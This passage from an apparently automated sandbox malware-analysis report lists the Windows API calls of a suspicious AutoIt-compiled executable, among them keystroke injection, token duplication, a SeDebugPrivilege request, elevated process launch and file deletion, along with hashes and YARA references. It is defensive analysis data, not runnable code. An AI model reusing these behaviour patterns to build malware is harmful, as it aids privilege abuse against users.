                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C158
                                                                              • DefDlgProcW.USER32(?,0000004E,?,?,004A83D8,?,004A83D8,?), ref: 0047C173
                                                                              • GetKeyState.USER32(00000011), ref: 0047C1A4
                                                                              • GetKeyState.USER32(00000009), ref: 0047C1AD
                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C1C0
                                                                              • GetKeyState.USER32(00000010), ref: 0047C1CA
                                                                              • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C1DE
                                                                              • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C20A
                                                                              • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C22D
                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047C2D6
                                                                              • SendMessageW.USER32 ref: 0047C2FB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$State$LongProcWindow
                                                                              • String ID: @GUI_DRAGID$F
                                                                              • API String ID: 1562745308-4164748364
                                                                              • Opcode ID: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                              • Instruction ID: f40edf6d5039c675f00343e7880f865f139be9e64e9b8d530a61de5f06f6045f
                                                                              • Opcode Fuzzy Hash: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                              • Instruction Fuzzy Hash: C6429F702042019FD714CF54C884FAB77A5EB89B04F548A6EFA48AB291DBB4EC45CB5A
                                                                              Function 004375B0 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 126threadkeyboardwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetForegroundWindow.USER32(00000000,?,?,004448AF,?), ref: 004375B3
                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004375D8
                                                                              • IsIconic.USER32(?), ref: 004375E1
                                                                              • ShowWindow.USER32(?,00000009,?,?,004448AF,?), ref: 004375EE
                                                                              • SetForegroundWindow.USER32(?), ref: 004375FD
                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00437615
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00437619
                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00437624
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437632
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437638
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 0043763E
                                                                              • SetForegroundWindow.USER32(?), ref: 00437645
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437654
                                                                              • keybd_event.USER32(00000012,00000000), ref: 0043765D
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043766B
                                                                              • keybd_event.USER32(00000012,00000000), ref: 00437674
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437682
                                                                              • keybd_event.USER32(00000012,00000000), ref: 0043768B
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437699
                                                                              • keybd_event.USER32(00000012,00000000), ref: 004376A2
                                                                              • SetForegroundWindow.USER32(?), ref: 004376AD
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376CD
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D3
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                              • String ID: Shell_TrayWnd
                                                                              • API String ID: 3778422247-2988720461
                                                                              • Opcode ID: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                              • Instruction ID: 6108fbe056c1a000d5481f33e03d330ccc862392245923d3170deea12ea07584
                                                                              • Opcode Fuzzy Hash: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                              • Instruction Fuzzy Hash: AC31A4712803157FE6245BA59D0EF7F3F9CEB48B51F10082EFA02EA1D1DAE458009B79
                                                                              Function 004461ED Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 227processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0044621B
                                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 00446277
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044628A
                                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004462A4
                                                                              • GetProcessWindowStation.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462BD
                                                                              • SetProcessWindowStation.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462C8
                                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004462E4
                                                                              • _wcslen.LIBCMT ref: 0044639E
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • _wcsncpy.LIBCMT ref: 004463C7
                                                                              • LoadUserProfileW.USERENV(?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 004463E7
                                                                              • CreateEnvironmentBlock.USERENV(?,?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00446408
                                                                              • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 00446446
                                                                              • UnloadUserProfile.USERENV(?,?,?,?,?,?,?), ref: 00446483
                                                                              • CloseWindowStation.USER32(00000000,?,?,?,?), ref: 00446497
                                                                              • CloseDesktop.USER32(00000000,?,?,?,?), ref: 0044649E
                                                                              • SetProcessWindowStation.USER32(?,?,?,?,?), ref: 004464A9
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?), ref: 004464B4
                                                                              • DestroyEnvironmentBlock.USERENV(?,?,?,?,?,?), ref: 004464C8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
                                                                              • String ID: $default$winsta0
                                                                              • API String ID: 2173856841-1027155976
                                                                              • Opcode ID: 60466c812311f25fb86c91292e7101a774af41f6c0f7563e11afd4658bd94aff
                                                                              • Instruction ID: eafd5d154f9bcf2590b8f8eb1e0f3d39b01f77f2fd200ee1cb9c7344d9c52646
                                                                              • Opcode Fuzzy Hash: 60466c812311f25fb86c91292e7101a774af41f6c0f7563e11afd4658bd94aff
                                                                              • Instruction Fuzzy Hash: DD819170208341AFE724DF65C848B6FBBE8AF89744F04491DF69097291DBB8D805CB6B
                                                                              Function 0044BD29 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\r6lOHDg9N9.exe,?,C:\Users\user\Desktop\r6lOHDg9N9.exe,004A8E80,C:\Users\user\Desktop\r6lOHDg9N9.exe,0040F3D2), ref: 0040FFCA
                                                                                • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A45
                                                                                • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A6C
                                                                                • Part of subcall function 00436A1D: __wcsicoll.LIBCMT ref: 00436A93
                                                                                • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                              • _wcscat.LIBCMT ref: 0044BD96
                                                                              • _wcscat.LIBCMT ref: 0044BDBF
                                                                              • __wsplitpath.LIBCMT ref: 0044BDEC
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0044BE04
                                                                              • _wcscpy.LIBCMT ref: 0044BE73
                                                                              • _wcscat.LIBCMT ref: 0044BE85
                                                                              • _wcscat.LIBCMT ref: 0044BE97
                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC3
                                                                              • DeleteFileW.KERNEL32(?), ref: 0044BED5
                                                                              • MoveFileW.KERNEL32(?,?), ref: 0044BEF5
                                                                              • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0C
                                                                              • DeleteFileW.KERNEL32(?), ref: 0044BF17
                                                                              • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2E
                                                                              • FindClose.KERNEL32(00000000), ref: 0044BF35
                                                                              • MoveFileW.KERNEL32(?,?), ref: 0044BF51
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF66
                                                                              • FindClose.KERNEL32(00000000), ref: 0044BF7E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                              • String ID: \*.*
                                                                              • API String ID: 2188072990-1173974218
                                                                              • Opcode ID: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                                              • Instruction ID: 14f7055b3521afb04026f42b490306401b0ba37f80ed0ea0ca267746d8cc4687
                                                                              • Opcode Fuzzy Hash: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                                              • Instruction Fuzzy Hash: CA5166B2008344AAD720DBA4DC44FDF73E8AB85314F448D1EF68982141EB79D64CCBAA
                                                                              Function 0042039F Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 282timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __invoke_watson.LIBCMT ref: 004203A4
                                                                                • Part of subcall function 00417D93: _memset.LIBCMT ref: 00417DBB
                                                                                • Part of subcall function 00417D93: IsDebuggerPresent.KERNEL32(?,?,00000314), ref: 00417E6F
                                                                                • Part of subcall function 00417D93: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000314), ref: 00417E79
                                                                                • Part of subcall function 00417D93: UnhandledExceptionFilter.KERNEL32(?,?,?,00000314), ref: 00417E86
                                                                                • Part of subcall function 00417D93: GetCurrentProcess.KERNEL32(C0000417,?,?,00000314), ref: 00417EA1
                                                                                • Part of subcall function 00417D93: TerminateProcess.KERNEL32(00000000,?,?,00000314), ref: 00417EA8
                                                                              • __get_daylight.LIBCMT ref: 004203B0
                                                                              • __invoke_watson.LIBCMT ref: 004203BF
                                                                              • __get_daylight.LIBCMT ref: 004203CB
                                                                              • __invoke_watson.LIBCMT ref: 004203DA
                                                                              • ____lc_codepage_func.LIBCMT ref: 004203E2
                                                                              • _strlen.LIBCMT ref: 00420442
                                                                              • __malloc_crt.LIBCMT ref: 00420449
                                                                              • _strlen.LIBCMT ref: 0042045F
                                                                              • _strcpy_s.LIBCMT ref: 0042046D
                                                                              • __invoke_watson.LIBCMT ref: 00420482
                                                                              • GetTimeZoneInformation.KERNEL32(00496C28), ref: 004204AA
                                                                              • WideCharToMultiByte.KERNEL32(?,?,00496C2C,?,?,0000003F,?,?), ref: 00420528
                                                                              • WideCharToMultiByte.KERNEL32(?,?,00496C80,000000FF,?,0000003F,?,?,?,00496C2C,?,?,0000003F,?,?), ref: 0042055C
                                                                                • Part of subcall function 00413A88: __lock.LIBCMT ref: 00413AA6
                                                                                • Part of subcall function 00413A88: ___sbh_find_block.LIBCMT ref: 00413AB1
                                                                                • Part of subcall function 00413A88: ___sbh_free_block.LIBCMT ref: 00413AC0
                                                                                • Part of subcall function 00413A88: RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                                                                                • Part of subcall function 00413A88: GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                                              • __invoke_watson.LIBCMT ref: 004205CC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __invoke_watson$ByteCharExceptionFilterMultiProcessUnhandledWide__get_daylight_strlen$CurrentDebuggerErrorFreeHeapInformationLastPresentTerminateTimeZone____lc_codepage_func___sbh_find_block___sbh_free_block__lock__malloc_crt_memset_strcpy_s
                                                                              • String ID: S\
                                                                              • API String ID: 4084823496-393906132
                                                                              • Opcode ID: dc5610741a0148f7786b6b9dfa96f50a6ae589fbdbcd52e429fe3139d0279a48
                                                                              • Instruction ID: b357f19af7064e56bcdb8625987f67de7edc2332d57e558cb2e7b84f91b73af7
                                                                              • Opcode Fuzzy Hash: dc5610741a0148f7786b6b9dfa96f50a6ae589fbdbcd52e429fe3139d0279a48
                                                                              • Instruction Fuzzy Hash: 6A91D371E00125AFDB20EF65EC819AE7BE9EF55300B95003BF540A7253DA3C89828F5C
                                                                              Function 00434D50 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 114fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00434D75
                                                                              • __swprintf.LIBCMT ref: 00434D91
                                                                              • _wcslen.LIBCMT ref: 00434D9B
                                                                              • _wcslen.LIBCMT ref: 00434DB0
                                                                              • _wcslen.LIBCMT ref: 00434DC5
                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00434DD7
                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00434E0A
                                                                              • _memset.LIBCMT ref: 00434E27
                                                                              • _wcslen.LIBCMT ref: 00434E3C
                                                                              • _wcsncpy.LIBCMT ref: 00434E6F
                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00434EA9
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00434EB4
                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 00434EBB
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00434ECE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                              • String ID: :$\$\??\%s
                                                                              • API String ID: 302090198-3457252023
                                                                              • Opcode ID: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                              • Instruction ID: 730b2dca1b6b09bd6b76555d3316dee95f4818bcffb97f26f8f03165767cfd2f
                                                                              • Opcode Fuzzy Hash: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                              • Instruction Fuzzy Hash: 30416676604340ABE330EB64DC49FEF73E8AFD8714F00891EF649921D1E7B4A645876A
                                                                              Function 00464422 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 193threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00444233: _wcslen.LIBCMT ref: 0044424E
                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046449E
                                                                              • GetLastError.KERNEL32 ref: 004644B4
                                                                              • GetCurrentThread.KERNEL32 ref: 004644C8
                                                                              • OpenThreadToken.ADVAPI32(00000000), ref: 004644CF
                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 004644E0
                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004644E7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: OpenProcess$CurrentThreadToken$ErrorLast_wcslen
                                                                              • String ID: SeDebugPrivilege
                                                                              • API String ID: 1312810259-2896544425
                                                                              • Opcode ID: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                              • Instruction ID: c3f5e6af55eb0da9fa74db60d4f5a84adac3a89a74612fbe59a223ef38337450
                                                                              • Opcode Fuzzy Hash: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                              • Instruction Fuzzy Hash: 0E51A171200201AFD710DF65DD85F5BB7A8AB84704F10892EFB44DB2C1D7B8E844CBAA
                                                                              Function 0040D6D0 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 141windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5
                                                                                • Part of subcall function 00401F80: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\r6lOHDg9N9.exe,00000104,?,?,?,?,00000000), ref: 00401FAD
                                                                                • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 00402078
                                                                                • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 0040208E
                                                                                • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020A4
                                                                                • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020BA
                                                                                • Part of subcall function 00401F80: _wcscpy.LIBCMT ref: 004020EF
                                                                              • IsDebuggerPresent.KERNEL32(?), ref: 0040D6F1
                                                                              • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\r6lOHDg9N9.exe,00000104,?,004A7CF8,004A7CFC), ref: 0040D763
                                                                                • Part of subcall function 00401440: GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00401483
                                                                              • SetCurrentDirectoryW.KERNEL32(?,00000001,C:\Users\user\Desktop\r6lOHDg9N9.exe,00000004), ref: 0040D7D6
                                                                              • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,004846D6,00000010), ref: 00431AAB
                                                                              • SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\Desktop\r6lOHDg9N9.exe,00000004), ref: 00431B0E
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,C:\Users\user\Desktop\r6lOHDg9N9.exe,00000004), ref: 00431B3F
                                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 00431B8B
                                                                              • ShellExecuteW.SHELL32(00000000), ref: 00431B92
                                                                                • Part of subcall function 004101F0: GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                • Part of subcall function 004101F0: LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                • Part of subcall function 004101F0: LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                • Part of subcall function 004101F0: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                • Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6
                                                                                • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                • Part of subcall function 0040E1E0: _memset.LIBCMT ref: 0040E202
                                                                                • Part of subcall function 0040E1E0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
                                                                              • String ID: @GH$@GH$C:\Users\user\Desktop\r6lOHDg9N9.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                              • API String ID: 2493088469-1406293824
                                                                              • Opcode ID: 69cfb0be49d24e5250ef6e64c59b5ea2b0a961f7c54b5140d3e7fdea8d41d4c7
                                                                              • Instruction ID: f6e0ab4c143dd9a1f797559286fb6c41f0380d60009eb7dc722615656bf0e84e
                                                                              • Opcode Fuzzy Hash: 69cfb0be49d24e5250ef6e64c59b5ea2b0a961f7c54b5140d3e7fdea8d41d4c7
                                                                              • Instruction Fuzzy Hash: 0341F731618341ABD320F7A19C49BAF3BA4AB96704F04493FF941672D1DBBC9949C72E
                                                                              Function 004037E0 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 359COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403871
                                                                              • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403887
                                                                              • __wsplitpath.LIBCMT ref: 004038B2
                                                                                • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                              • _wcscpy.LIBCMT ref: 004038C7
                                                                              • _wcscat.LIBCMT ref: 004038DC
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 004038EC
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,0040397D,?,?,00000010), ref: 00403F54
                                                                                • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,00000010), ref: 00403F8B
                                                                              • _wcscpy.LIBCMT ref: 004039C2
                                                                              • _wcslen.LIBCMT ref: 00403A53
                                                                              • _wcslen.LIBCMT ref: 00403AAA
                                                                              Strings
                                                                              • Unterminated string, xrefs: 0042B9BA
                                                                              • #include depth exceeded. Make sure there are no recursive includes, xrefs: 0042B87B
                                                                              • _, xrefs: 00403B48
                                                                              • Error opening the file, xrefs: 0042B8AC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
